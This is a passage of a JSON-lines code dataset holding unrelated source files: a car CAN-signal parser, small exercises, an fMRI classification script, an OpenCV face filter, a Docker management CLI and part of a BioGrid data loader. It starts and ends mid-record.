0),\n (\"ACC_AVAILABLE\", \"ACC_2\", 0),\n (\"HIGH_BEAM_FLASH\", \"STEERING_LEVERS\", 0),\n (\"ACC_SET_SPEED_MPH\", \"DASHBOARD\", 0),\n (\"LEAD_DIST\", \"DASHBOARD\", 0),\n (\"CRUISE_STATE\", \"DASHBOARD\", 0),\n (\"TORQUE_DRIVER\", \"EPS_STATUS\", 0),\n (\"DRIVER_TAKEOVER\", \"EPS_STATUS\", 0),\n (\"TORQUE_MOTOR\", \"EPS_STATUS\", 0),\n (\"LKAS_STEER_FAULT\", \"EPS_STATUS\", 0),\n (\"COUNTER\", \"EPS_STATUS\", -1),\n (\"TRACTION_OFF\", \"TRACTION_BUTTON\", 0),\n (\"SEATBELT_DRIVER_UNLATCHED\", \"SEATBELT_STATUS\", 0),\n (\"APA_ACTIVE\", \"EPS_STATUS\", 0),\n (\"APA_STEER_FAULT\", \"EPS_STATUS\", 0),\n (\"ACC_STOP\", \"ACC_2\", 0),\n (\"BLIND_SPOT_RIGHT\", \"BLIND_SPOT_WARNINGS\", 0),\n (\"BLIND_SPOT_LEFT\", \"BLIND_SPOT_WARNINGS\", 0),\n (\"COUNTER\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_RESUME\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_CANCEL\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_SPEED_INC\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_SPEED_DEC\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_FOLLOW_INC\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_FOLLOW_DEC\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_BUTTON_ON\", \"WHEEL_BUTTONS\", 0),\n (\"ACC_DISTANCE_CONFIG_2\", \"DASHBOARD\", 0),\n (\"STANDSTILL\", \"BRAKE_1\", 0),\n (\"BRAKE_VAL_TOTAL\", \"BRAKE_1\", 0),\n (\"VEHICLE_SPEED_KPH\", \"BRAKE_1\", 0),\n (\"BRAKE_LIGHT\", \"BRAKE_2\", 0),\n (\"APA_STEER_ACT\", \"AUTO_PARK_REQUEST\", 0),\n (\"ACC_OVERRIDE\", \"ACCEL_RELATED_120\", 0),\n (\"ACC_BRAKE_FAIL\", \"BRAKE_2\", 0),\n (\"ACC_ENG_OK\", \"ACCEL_RELATED_120\", 0),\n (\"ACC_ERROR\", \"ACC_ERROR\", 0),\n (\"LONG_ACCEL\", \"INERTIAL_SENSOR\", 0),\n ]\n\n checks = [\n # sig_address, frequency\n (\"BRAKE_2\", 50),\n (\"EPS_STATUS\", 100),\n (\"SPEED_1\", 100),\n (\"WHEEL_SPEEDS\", 50),\n (\"STEERING\", 100),\n (\"ACC_2\", 50),\n (\"GEAR\", 50),\n (\"ACCEL_GAS_134\", 50),\n (\"DASHBOARD\", 
15),\n (\"STEERING_LEVERS\", 10),\n (\"SEATBELT_STATUS\", 2),\n (\"DOORS\", 1),\n (\"TRACTION_BUTTON\", 1),\n (\"BLIND_SPOT_WARNINGS\", 2),\n (\"BRAKE_1\", 50),\n (\"AUTO_PARK_REQUEST\", 50),\n (\"WHEEL_BUTTONS\", 1),\n (\"ACCEL_GAS_22F\", 50),\n (\"ACCEL_RELATED_120\", 50),\n (\"ACC_ERROR\", 0),\n (\"INERTIAL_SENSOR\", 50),\n ]\n\n if CP.enablehybridEcu:\n signals += [\n (\"VEH_ON\", \"HYBRID_ECU\", 0),\n (\"AXLE_TORQ\", \"AXLE_TORQ\", 0),\n (\"AXLE_TORQ_MIN\", \"AXLE_TORQ\", 0),\n (\"AXLE_TORQ_MAX\", \"AXLE_TORQ\", 0),\n (\"ELEC_MODE_PERCENT\", \"HEV_HMI\", 0),\n ]\n checks += [\n (\"HYBRID_ECU\", 1),\n (\"AXLE_TORQ\", 100),\n (\"HEV_HMI\", 10),\n ]\n\n if CP.enableBsm:\n signals += [\n (\"BLIND_SPOT_RIGHT\", \"BLIND_SPOT_WARNINGS\", 0),\n (\"BLIND_SPOT_LEFT\", \"BLIND_SPOT_WARNINGS\", 0),\n ]\n checks += [(\"BLIND_SPOT_WARNINGS\", 2)]\n\n return CANParser(DBC[CP.carFingerprint][\"pt\"], signals, checks, 0)\n\n @staticmethod\n def get_cam_can_parser(CP):\n signals = [\n # sig_name, sig_address, default\n (\"COUNTER\", \"LKAS_COMMAND\", -1),\n (\"LKAS_BUTTON_LED\", \"LKAS_HEARTBIT\", -1)\n ]\n checks = [\n (\"LKAS_COMMAND\", 100),\n (\"LKAS_HEARTBIT\", 10),\n (\"LKAS_HUD\", 4),\n ]\n\n return CANParser(DBC[CP.carFingerprint][\"pt\"], signals, checks, 2)\n","sub_path":"selfdrive/car/chrysler/carstate.py","file_name":"carstate.py","file_ext":"py","file_size_in_byte":9586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"227121754","text":"class Solution(object):\n def numJewelsInStones(self, J, S):\n \"\"\"\n :type J: str\n :type S: str\n :rtype: int\n \"\"\"\n dict = {}\n for x in J:\n dict[x] = 1\n i = 0\n for x in S:\n if x in dict:\n i += 1\n return i\n\n\nJ = \"aA\"\nS = \"aAAbbbb\"\nprint(Solution().numJewelsInStones(J, S))\n","sub_path":"vol 7/771.py","file_name":"771.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"199545389","text":"import math\n\ndef main ():\n\tmessage = input(\"Enter you message: \")\n\tkey = int(input(\"Enter the key: \"))\n\tmode = input(\"Enter (E) to encrypt or (D) to decrypt: \")\n\tif mode.lower() == \"e\":\n\t\tciphertext = encryptMessage(key, message)\n\t\tprint(ciphertext + ' end')\n\telif mode.lower() == \"d\":\n\t\tdecrypt_text = decryptMessage(key, message)\n\t\tprint(decrypt_text + ' end')\n\ndef encryptMessage(myKey, myMessage):\n\tciphertext = [''] * myKey\n\tfor col in range(myKey):\n\t\tpointer = col\n\t\t\n\t\twhile pointer < len(myMessage):\n\t\t\tciphertext[col] += myMessage[pointer]\n\t\t\tpointer += myKey\n\treturn ''.join(ciphertext)\n\ndef decryptMessage(myKey, myMessage):\n\tnumber_of_cols = math.ceil(len(myMessage)/myKey)\n\tnumber_of_rows = myKey\n\tshaded = (number_of_rows*number_of_cols) - len(myMessage)\n\t\n\tcol = 0\n\trow = 0\n\n\tplain_text = ['']*number_of_cols\n\t\n\tfor char in myMessage:\n\t\tplain_text[col] += char\n\t\tcol += 1\n\t\tif (col == number_of_cols) or (col == number_of_cols - 1 and row >= number_of_rows - shaded):\n\t\t\tcol = 0\n\t\t\trow += 1\n\treturn ''.join(plain_text)\n\t\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"transposition_cipher.py","file_name":"transposition_cipher.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"54980235","text":"import curses\nimport time\nfrom game_loop_events import(\n on_start,\n on_key_pressed,\n on_update,\n 
on_render \n)\n\n\nclass FigureConsoleDrawer:\n\n def __init__(self, stdscr):\n self.stdscr = stdscr\n\n def draw(self, figure):\n\n y = 0\n for r in figure.shape():\n x = 0\n for c in r:\n if c:\n self.stdscr.addstr(y + figure.position.y, x + figure.position.x, 'X')\n x += 1\n y += 1\n\n\ndef main(stdscr):\n \n drawer = FigureConsoleDrawer(stdscr)\n\n stdscr.nodelay(1)\n\n dt = 0\n time_spent = 0\n\n ctx = dict()\n ctx['drawer'] = drawer\n\n on_start(ctx)\n\n while True:\n\n stdscr.refresh()\n\n time_spent += dt\n\n started = time.time() \n\n # Input handling\n c = None\n try:\n c = stdscr.getkey()\n except:\n pass\n\n if c:\n on_key_pressed(ctx, c)\n \n # Model update\n \n on_update(ctx, dt)\n\n # Rendering\n stdscr.clear()\n on_render(ctx, dt)\n\n dt = time.time() - started\n\n if ctx.get('abort', False): break\n\n\ncurses.wrapper(main)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"332313819","text":"def lift(target, proba, n_buckets=10):\n import pandas as pd\n import numpy as np\n\n n_records = len(target)\n bucket_sz = int(n_records / n_buckets)\n\n counts = np.ones(n_buckets, int)*bucket_sz\n counts[:n_records%n_buckets] += 1\n tops = [np.full(c, n, int) for c, n in zip(counts, range(1, n_buckets+1))]\n tops = np.concatenate(tops)\n\n df = pd.DataFrame({'target': target, 'proba': proba})\n df = df.sort_values('proba', ascending=False)\n df['top'] = tops\n target_sum = df.groupby('top').target.sum()\n ff = pd.DataFrame({'target_cnt': target_sum, 'cnt': counts})\n ff['target_cnt_cum'] = ff.target_cnt.cumsum()\n ff['cnt_cum'] = ff.cnt.cumsum()\n ff['target_share'] = ff.target_cnt/ff.cnt\n ff['target_share_cum'] = ff.target_cnt_cum/ff.cnt_cum\n target_cnt = ff.target_cnt.sum()\n target_share = float(target_cnt)/ff.cnt.sum()\n ff['lift'] = ff.target_share/target_share\n ff['cum_lift'] = ff.target_share_cum/target_share\n ff['coverage'] = ff.target_cnt_cum/target_cnt\n return ff","sub_path":"sparktools/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"235292389","text":"\"\"\" write a program to get a single character and print the ASCII value of it \"\"\"\n\n\nch=input(\"Enter a character : \")\n\nif len(ch) == 1 :\n print(\"ASCII value of \" + ch + \" is\", ord(ch))\n\nelse :\n print(\"Please enter a single character\")\n\n \n\n\n","sub_path":"if else programs/program --9.py","file_name":"program --9.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"321692814","text":"import wx\nglobal coord\ncoord = (30, 30)\nclass MyFrame(wx.Frame):\n\t\"\"\"create a color frame, inherits from wx.Frame\"\"\"\n\tglobal coord\n\tdef __init__(self, parent):\n\t\t# -1 is the default ID\n\t\twx.Frame.__init__(self, parent, -1, \"Click for mouse position\", size=(400,300),\n\t\t\t\t\t\t style=wx.DEFAULT_FRAME_STYLE | wx.NO_FULL_REPAINT_ON_RESIZE)\n\t\tself.SetBackgroundColour('Goldenrod')\n\t\tself.SetCursor(wx.StockCursor(wx.CURSOR_PENCIL))\n\n\t\t# hook some mouse events\n\t\tself.Bind(wx.EVT_LEFT_DOWN, self.OnLeftDown)\n\t\tself.Bind(wx.EVT_RIGHT_DOWN, self.OnRightDown)\n\t\tself.Bind(wx.EVT_PAINT, self.OnPaint)\n\n\n\tdef OnLeftDown(self, event):\n\t\tglobal coord\n\t\t\"\"\"left mouse button is pressed\"\"\"\n\t\tpt = event.GetPosition() # position tuple\n\t\tprint (pt)\n\t\tcoord = 
pt\n\t\tself.SetTitle('LeftMouse = ' + str(pt))\n\t\tself.Refresh()\n\n\tdef OnRightDown(self, event):\n\t\tglobal coord\n\t\t\"\"\"right mouse button is pressed\"\"\"\n\t\tpt = event.GetPosition()\n\t\tcoord = pt\n\t\tprint (pt)\n\n\t\tself.SetTitle('RightMouse = ' + str(pt))\n\t\tself.Refresh()\n\n\n\tdef OnPaint(self, event):\n\t\tglobal coord\n\t\tdc = wx.PaintDC(self)\n\t\tdc.Clear()\n\t\tdc.SetPen(wx.Pen(wx.BLACK, 4))\n\t\tdc.DrawLine(0, 0, int(str(coord[0])), int(str(coord[1])))\n\napp = wx.PySimpleApp()\nframe = MyFrame(None)\nframe.Show(True)\napp.MainLoop()","sub_path":"_misc/mdraw.py","file_name":"mdraw.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"266992637","text":"#import necessary modules\n\nfrom classes import *\nimport cv2\n\n\n#Uses Laptop Camera\ncamera = cv2.VideoCapture(0)\n\n#Raises an error if unable to open camera\nif not camera.isOpened():\n raise IOError(\"Cannot Open Camera\")\nif camera.isOpened():\n print(\"Camera Opening...\", \"\\n\")\n print(\"Press ESC to Close Camera\", \"\\n\")\n\n\nwhile True:\n #reads evry frame\n ret, frame = camera.read()\n\n #creates an object with the class Frame and Face\n frameobject = Frame(frame)\n faceobject = Face(frame)\n\n #puts a christmas Hat over the head\n faceobject.putHat()\n\n #adds Christmas Lights, and Snow in the Background\n frameobject.putLights()\n\n frameobject.putSnow()\n\n #draws a beard, a mustache and colors the eyebrows and lips white\n frame = faceobject.Santa()\n\n #displays every frame\n cv2.imshow(\"Snapchat Filter\", frame)\n\n #breaks loop when ESC if pressed\n if cv2.waitKey(1) == 27:\n break\n\n#closes camera\nprint(\"Closing Camera\")\ncamera.release()\ncv2.destroyAllWindows()\n","sub_path":"filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"557363486","text":"\"\"\"\nFor classifying fMRI images\n\"\"\"\n#%matplotlib inline\nimport os\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport mne\n\n#from nilearn import datasets\nfrom nilearn.image import new_img_like, load_img, index_img, clean_img, concat_imgs\nfrom nilearn.plotting import plot_stat_map, plot_img, show\nfrom nilearn import decoding, plotting\nfrom nilearn.decoding import SearchLight\nfrom nilearn.input_data import NiftiMasker\n\nfrom sklearn.model_selection import permutation_test_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import SVC\nfrom sklearn.svm import LinearSVC\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.model_selection import cross_validate\n\n\n#########################################################################\n# Read ad split data\n#########################################################################\n\n\n#The fMRI data\nfmri_filepath = 'MR_classification/data/beta4D_all.nii'\nlabel_path = 'MR_classification/data/class_labels_faces.csv'\nmask_path = 'MR_classification/data/individual/mask_57.nii'\n#struct_path = 'MR_classification/data/single_subj_T1 copy.nii'\n#struct_path = 'MR_classification/sSubjectNo0054-0005-00001-000176-01.nii'\nstruct_path = 'MR_classification/wfSubjectNo0054-0006-00424-000424-01.nii'\n\n#load fMRI data\nfmri_img = load_img(fmri_filepath) \n\n#inspect data\nfmri_img.shape #dimensions (79, 95, 79, class_label) or 
9*class_labels\n\n#load csv-file with class labels\nconditions = pd.read_csv(label_path, sep=\",\")\n\n#Make an index for spliting fMRI data with same size as class labels\nidx = np.arange(len(conditions))\n\n# create training and testing vars on the basis of class labels\nidx1, idx2, conditions1, conditions2 = train_test_split(idx, conditions, test_size=0.2)\n\n\n# Reshaping data------------------------------\nfmri_img1 = index_img(fmri_img, idx1)\nfmri_img2 = index_img(fmri_img, idx2)\n\nfmri_img1.shape\nfmri_img2.shape\n\n#Load the whole brain mask\nmask_img = load_img(mask_path)\n\n\n#########################################################################\n# Conduct searchlight SVM\n#########################################################################\nprint(\"doing SVM C = 0.025\")\n\n# The radius is the one of the Searchlight sphere that will scan the volume\nsearchlight = SearchLight(\n mask_img,\n estimator=LinearSVC(C = 0.025),\n radius=5, n_jobs=-1, # to use all cores \n verbose=1, cv=5)\nsearchlight.fit(fmri_img1, conditions1)\n\nsearchlight_img = new_img_like(struct_path, searchlight.scores_)\nplot_img(searchlight_img, bg_img=struct_path,\n vmin=.42, threshold=.2, black_bg=True, colorbar = True, draw_cross = False)\n\n\n\n # ----------\n####Create a mask with the 500 best voxels\nprint(searchlight.scores_.size)\n#Find the percentile that makes the cutoff for the 500 best voxels\nperc=100*(1-500.0/searchlight.scores_.size)\n#Print percentile\nprint(perc)\n#Find the cutoff\ncut=np.percentile(searchlight.scores_,perc)\n#Print cutoff\nprint(cut)\n\n\n# .astype() makes a copy.\nprocess_mask = mask_img.get_data().astype(np.int)\nprocess_mask[searchlight.scores_<=cut] = 0\nprocess_mask_img = new_img_like(mask_img, process_mask)\n\n\n#plotting.plot_glass_brain effects\nplotting.plot_glass_brain(searchlight_img, colorbar = True, threshold=cut)\n\nplotting.plot_roi(searchlight_img, bg_img=struct_path, colorbar = True, threshold = cut, cmap = 'RdBu_r', draw_cross = True)\nplotting.plot_roi(searchlight_img, bg_img=struct_path, colorbar = True, threshold = 0.6, cmap = 'RdBu_r', black_bg = True, draw_cross = False)\n\n\n####### Make a classification on the 2nd split using the best voxels\n\nmasker = NiftiMasker(mask_img=process_mask_img, standardize=False)\n\n# We use masker to retrieve a 2D array ready\n# for machine learning with scikit-learn\nfmri_masked = masker.fit_transform(fmri_img2)\n#Print size of matrix (images x voxels)\nprint(fmri_masked.shape)\n\n\ncv_score = cross_val_score(LinearSVC(C = 0.025), fmri_masked, np.ravel(conditions2), cv=5, scoring = 'accuracy')\nprint(cv_score)\nprint('Mean prediction score:')\nprint(np.mean(cv_score))\n\n#########################################################################\n# Permutation test - SVM\n#########################################################################\n\n\n#Perform a permutation test\nscore, permutation_scores, pvalue = permutation_test_score(\n LinearSVC(C = 0.025), fmri_masked, np.ravel(conditions2), cv=5, n_permutations=10_000, \n n_jobs=-1, random_state=0, verbose=0, scoring=None)\nprint(\"Classification Accuracy: %s (pvalue : %s)\" % (score, pvalue))\n\n#View a histogram of permutation scores\n\n#How many classes\nn_classes = np.unique(conditions2).size\n\nplt.hist(permutation_scores, 20, label='Permutation scores',\n edgecolor='black')\nylim = plt.ylim()\nplt.plot(2 * [score], ylim, '--g', linewidth=3,\n label='Classification Score'\n ' (pvalue %s)' % round(pvalue, 4))\nplt.plot(2 * [1. 
/ n_classes], ylim, '--k', linewidth=3, label='Chance level')\n\nplt.ylim(ylim)\nplt.legend()\nplt.xlabel('Score')\nplt.show()\n\n\n\n#########################################################################\n# Redone using NB\n#########################################################################\n\nprint(\"\\n \\n doing NB\\n \\n \")\n\n# The radius is the one of the Searchlight sphere that will scan the volume\nsearchlightNB = SearchLight(\n mask_img,\n estimator=GaussianNB(),\n radius=5, n_jobs=-1, # to use all cores \n verbose=1, cv=5)\nsearchlightNB.fit(fmri_img1, conditions1)\n\nsearchlightNB_img = new_img_like(struct_path, searchlightNB.scores_)\nplot_img(searchlightNB_img, bg_img=struct_path,\n vmin=.42, threshold=.2, black_bg=True, colorbar = True, draw_cross = False)\n\n\nperc=100*(1-500.0/searchlightNB.scores_.size)\ncut=np.percentile(searchlightNB.scores_,perc)\nprocess_mask = mask_img.get_data().astype(np.int)\nprocess_mask[searchlightNB.scores_<=cut] = 0\nprocess_mask_img = new_img_like(mask_img, process_mask)\n\n#plotting\nplotting.plot_glass_brain(searchlightNB_img, colorbar = True, threshold=cut)\n\nplotting.plot_roi(searchlightNB_img, bg_img=struct_path, colorbar = True, threshold = cut, cmap = 'RdBu_r', draw_cross = False)\nplotting.plot_roi(searchlightNB_img, bg_img=struct_path, colorbar = True, threshold = 0.6, cmap = 'RdBu_r', black_bg = True, draw_cross = False)\n\nmasker = NiftiMasker(mask_img=process_mask_img, standardize=False)\nfmri_masked = masker.fit_transform(fmri_img2)\n\n#CV\ncv_score = cross_val_score(GaussianNB(), fmri_masked, np.ravel(conditions2), cv=5)\nprint(cv_score)\nprint('Mean prediction score:')\nprint(np.mean(cv_score))\n\n#Perform a permutation test\nscore, permutation_scores, pvalue= permutation_test_score(\n GaussianNB(), fmri_masked, np.ravel(conditions2), cv=5, n_permutations=10_000, \n n_jobs=-1, random_state=0, verbose=0, scoring=None)\nprint(\"Classification Accuracy: %s (pvalue : %s)\" % (score, pvalue))\n\n# plotting permutationstest\nn_classes = np.unique(conditions2).size\nplt.hist(permutation_scores, 20, label='Permutation scores',\n edgecolor='black')\nylim = plt.ylim()\nplt.plot(2 * [score], ylim, '--g', linewidth=3,\n label='Classification Score'\n ' (pvalue %s)' % round(pvalue, 4))\nplt.plot(2 * [1. 
/ n_classes], ylim, '--k', linewidth=3, label='Chance level')\n\nplt.ylim(ylim)\nplt.legend()\nplt.xlabel('Score')\nplt.show()\n\n\n\n#########################################################################\n# Redone using less conservative SVM\n#########################################################################\nprint(\"\\n \\n doing SVM C = 1\\n \\n \")\n\n# The radius is the one of the Searchlight sphere that will scan the volume\nsearchlightSVM = SearchLight(\n mask_img,\n estimator=LinearSVC(C = 1),\n radius=5, n_jobs=-1, # to use all cores \n verbose=1, cv=5)\nsearchlightSVM.fit(fmri_img1, conditions1)\n\nsearchlightSVM_img = new_img_like(struct_path, searchlightSVM.scores_)\nplot_img(searchlightSVM_img, bg_img=struct_path,\n vmin=.42, threshold=.2, black_bg=True, colorbar = True, draw_cross = False)\n\n\nperc=100*(1-500.0/searchlightSVM.scores_.size)\ncut=np.percentile(searchlightSVM.scores_,perc)\nprocess_mask = mask_img.get_data().astype(np.int)\nprocess_mask[searchlightSVM.scores_<=cut] = 0\nprocess_mask_img = new_img_like(mask_img, process_mask)\n\n#plotting\nplotting.plot_glass_brain(searchlightSVM_img, colorbar = True, threshold=cut)\n\nplotting.plot_roi(searchlightSVM_img, bg_img=struct_path, colorbar = True, threshold = cut, cmap = 'RdBu_r', draw_cross = False)\nplotting.plot_roi(searchlightSVM_img, bg_img=struct_path, colorbar = True, threshold = 0.6, cmap = 'RdBu_r', black_bg = True, draw_cross = False)\n\nmasker = NiftiMasker(mask_img=process_mask_img, standardize=False)\nfmri_masked = masker.fit_transform(fmri_img2)\n\n#CV\ncv_score = cross_val_score(LinearSVC(C = 1), fmri_masked, np.ravel(conditions2), cv=5)\nprint(cv_score)\nprint('Mean prediction score:')\nprint(np.mean(cv_score))\n\n#Perform a permutation test\nscore, permutation_scores, pvalue= permutation_test_score(\n LinearSVC(C = 1), fmri_masked, np.ravel(conditions2), cv=5, n_permutations=10_000, \n n_jobs=-1, random_state=0, verbose=0, scoring=None)\nprint(\"Classification Accuracy: %s (pvalue : %s)\" % (score, pvalue))\n\n# plotting permutationstest\nn_classes = np.unique(conditions2).size\nplt.hist(permutation_scores, 20, label='Permutation scores',\n edgecolor='black')\nylim = plt.ylim()\nplt.plot(2 * [score], ylim, '--g', linewidth=3,\n label='Classification Score'\n ' (pvalue %s)' % round(pvalue, 4))\nplt.plot(2 * [1. 
/ n_classes], ylim, '--k', linewidth=3, label='Chance level')\n\nplt.ylim(ylim)\nplt.legend()\nplt.xlabel('Score')\nplt.show()\n\n\n## Save models:\nfrom joblib import dump, load\n\n\ndump(searchlightSVM, \"searchlight_svm_c1.joblib\")\ndump(searchlightNB, \"searchlight_NB.joblib\")\ndump(searchlight, \"searchlight_svm_c0.025.joblib\")\n\n\ntest = load(\"searchlight_svm_c0.025.joblib\")\n\nnp.max(test.scores_)\n\nperc=100*(1-500.0/test.scores_.size)\ncut=np.percentile(test.scores_,perc)\n#########################################################################\n# Amygdala\n#########################################################################\nam_mask_path = 'MR_classification/amygdala_mask.nii'\n\nam_mask_img = load_img(am_mask_path)\n\nam_masker = NiftiMasker(mask_img=am_mask_img, standardize=False)\nfmri_masked = am_masker.fit_transform(fmri_img)\nconditions = np.repeat(np.ravel(conditions), 9)\n\nam_cv = cross_validate(LinearSVC(C = 0.025), fmri_masked, conditions, cv=8, n_jobs=-1, scoring=\"accuracy\")\nprint(\"cv_mean:\", np.mean(am_cv['test_score']))\n\nscore, permutation_scores, pvalue = permutation_test_score(\n LinearSVC(C = 0.025), fmri_masked, conditions, cv=8, n_permutations=100, \n n_jobs=-1)\n\nn_classes = np.unique(conditions2).size\nplt.hist(permutation_scores, 20, label='Permutation scores',\n edgecolor='black')\nylim = plt.ylim()\nplt.plot(2 * [score], ylim, '--g', linewidth=3,\n label='Classification Score'\n ' (pvalue %s)' % round(pvalue, 4))\nplt.plot(2 * [1. / n_classes], ylim, '--k', linewidth=3, label='Chance level')\n\nplt.ylim(ylim)\nplt.legend()\nplt.xlabel('Score')\nplt.show()","sub_path":"MR_classification/classify.py","file_name":"classify.py","file_ext":"py","file_size_in_byte":11149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"277646782","text":"# cli.py\nfrom __future__ import absolute_import\n\nimport logging\nimport os\nimport re\nimport subprocess\nimport sys\n\nimport click\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_MACHINE_NAME = os.environ.get('DO_MACHINE_NAME')\n\n# used to allow -h for help\nCONTEXT_SETTINGS = dict(help_option_names=['-h', '--help'])\n\ndef get_container_id(name):\n name_id = _run_command('docker-compose ps -q {}'.format(name))\n\n name_id = name_id.strip()\n\n if '\\n' in name_id:\n name_id = name_id.split('\\n')[-1]\n\n return name_id.strip()\n\n@click.group(context_settings=CONTEXT_SETTINGS)\n@click.version_option('1.0.0')\n@click.pass_context\ndef cli(ctx):\n pass\n\n@cli.command(context_settings=dict(\n ignore_unknown_options=True,\n))\n@click.argument('ARGS', nargs=-1, type=click.UNPROCESSED)\ndef migrate(args):\n \"\"\"Migrate the Django app\"\"\"\n web_id = get_container_id('web')\n\n _run_command(\n 'docker exec -it {} python manage.py migrate --noinput {}'.format(\n web_id, ' '.join(args)),\n interactive=True,\n unbuffered_print=True)\n\n@cli.command(context_settings=dict(\n ignore_unknown_options=True,\n))\n@click.argument('ARGS', nargs=-1, type=click.UNPROCESSED)\ndef makemigrations(args):\n \"\"\"Make migrations\"\"\"\n web_id = get_container_id('web')\n\n _run_command(\n 'docker exec -it {} python manage.py makemigrations --noinput {}'.format(\n web_id, ' '.join(args)),\n interactive=True,\n unbuffered_print=True)\n\n@cli.command()\ndef attach():\n \"\"\"Attach to the running web container for debugging\"\"\"\n web_id = get_container_id('web')\n\n _run_command(\n 'docker attach {}'.format(web_id),\n interactive=True,\n 
unbuffered_print=True)\n\n@cli.command()\n@click.argument('CONTAINER', default='web', type=click.STRING, nargs=1)\ndef bash(container):\n \"\"\"Start a bash shell on CONTAINER. Default: web\"\"\"\n container_id = get_container_id(container)\n\n _run_command(\n 'docker exec -it {} /bin/bash --login'.format(container_id),\n interactive=True)\n\ndef _run_command(cmd, interactive=False, use_docker_env=False,\n unbuffered_print=False):\n \"\"\"\n Executes a given shell command\n\n Args:\n cmd (str): The command to execute\n interact (bool): If True hand the controlling terminal over to the\n subprocess. Useful when user input is needed for the command\n use_docker_env (bool): Prefix the commands with the output of\n ``docker-machine env ``.\n\n Returns:\n str: Output of the command\n \"\"\"\n logger.debug(cmd)\n env = None\n if use_docker_env:\n env = docker_env_prefix()\n\n if interactive:\n try:\n import pexpect\n except ImportError:\n sys.stderr.write('Missing pexpect requirement. pip install '\n 'pexpect')\n sys.exit(1)\n sys.stdout.write('Running interactive command...\\n')\n\n cmd = cmd.split(' ')\n pexpect.spawn(cmd[0], list(cmd[1:]), env=env).interact()\n else:\n import subprocess\n\n try:\n p = subprocess.Popen(\n cmd.strip(),\n shell=True,\n bufsize=0,\n stdout=subprocess.PIPE,\n stderr=sys.stderr,\n env=env)\n\n if unbuffered_print:\n while p.poll() is None:\n for l in p.stdout.readline():\n click.echo(l, nl=False)\n else:\n p.wait()\n return p.stdout.read().decode(\"utf8\")\n\n except subprocess.CalledProcessError:\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n cli()\n","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"85611509","text":"import os\nimport logging\nimport re\n\nfrom datetime import datetime\nfrom stat import ST_CTIME\nfrom zipfile import ZipFile\n\nfrom dipper import config\nfrom dipper.sources.Source import Source\nfrom dipper.models.Model import Model\nfrom dipper.models.assoc.InteractionAssoc import InteractionAssoc\nfrom dipper.models.Dataset import Dataset\n\n__author__ = 'nicole'\n\nlogger = logging.getLogger(__name__)\nBGDL = 'http://thebiogrid.org/downloads/archives/Latest%20Release'\n\n\nclass BioGrid(Source):\n \"\"\"\n Biogrid interaction data\n\n \"\"\"\n # TODO write up class summary for docstring\n\n files = {\n 'interactions': {\n 'file': 'interactions.mitab.zip',\n 'url': BGDL + '/BIOGRID-ALL-LATEST.mitab.zip'},\n 'identifiers': {\n 'file': 'identifiers.tab.zip',\n 'url': BGDL + '/BIOGRID-IDENTIFIERS-LATEST.tab.zip'}\n }\n\n # biogrid-specific identifiers for use in subsetting identifier mapping\n biogrid_ids = [\n 106638, 107308, 107506, 107674, 107675, 108277, 108506, 108767, 108814,\n 108899, 110308, 110364, 110678, 111642, 112300, 112365, 112771, 112898,\n 199832, 203220, 247276, 120150, 120160, 124085]\n\n def __init__(self, graph_type, are_bnodes_skolemized, tax_ids=None):\n super().__init__(graph_type, are_bnodes_skolemized, 'biogrid')\n\n self.tax_ids = tax_ids\n\n self.dataset = Dataset(\n 'biogrid', 'The BioGrid', 'http://thebiogrid.org/', None,\n 'http://wiki.thebiogrid.org/doku.php/terms_and_conditions')\n\n # Defaults\n # our favorite animals\n # taxids = [9606,10090,10116,7227,7955,6239,8355]\n if self.tax_ids is None:\n self.tax_ids = [9606, 10090, 7955]\n\n if 'test_ids' not in config.get_config() or \\\n 'gene' not in config.get_config()['test_ids']:\n logger.warning(\"not configured with gene test 
